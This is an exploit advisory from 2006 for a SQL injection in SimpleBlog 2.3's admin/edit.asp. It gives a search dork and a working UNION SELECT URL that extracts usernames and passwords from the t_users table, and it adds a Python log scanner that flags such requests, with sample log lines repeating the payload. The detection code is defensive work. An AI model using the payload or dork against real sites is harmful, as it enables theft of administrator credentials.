
# Title : SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
# Published : 2006-11-26
# Author : bolivar


# Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!
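
For defenders, an added example that is not part of the original advisory: a log check that flags requests to `admin/edit.asp` whose `id` value is not a plain integer, which is how the request above shows up in an IIS W3C log. The log lines, the field layout and the name `suspicious_edit_requests` are constructed for illustration, and it is an assumption that legitimate `id` values are always numeric.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (sample data, not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-11-27 10:02:11 192.0.2.10 GET /blog/admin/edit.asp id=12 200
2006-11-27 10:05:43 198.51.100.7 GET /blog/admin/edit.asp id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users 200
2006-11-27 10:06:02 198.51.100.7 GET /blog/admin/edit.asp id=%2D1%20UNION%20SELECT%200 500
2006-11-27 10:07:30 192.0.2.10 GET /blog/default.asp id=3 200
"""

# Assumption: a legitimate post id is a short run of ASCII digits.
PLAIN_ID = re.compile(r"[0-9]{1,10}")

def suspicious_edit_requests(log_text, page="/admin/edit.asp"):
    """Return log entries for `page` whose decoded id is not a plain integer."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(page):
            continue
        query = row.get("cs-uri-query", "-")
        # parse_qs decodes both '+' and %xx, so encoded variants are normalised
        params = parse_qs("" if query == "-" else query, keep_blank_values=True)
        # Classic ASP treats query-string names case-insensitively
        ids = [v for k, vals in params.items() if k.lower() == "id" for v in vals]
        bad = [v for v in ids if not PLAIN_ID.fullmatch(v)]
        if bad:
            hits.append({
                "time": f'{row.get("date", "")} {row.get("time", "")}'.strip(),
                "client": row.get("c-ip", ""),
                "id": bad[0],
                "status": row.get("sc-status", ""),
            })
    return hits

if __name__ == "__main__":
    for hit in suspicious_edit_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced server-side before the value reaches the SQL statement, is the input check this parameter needs.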
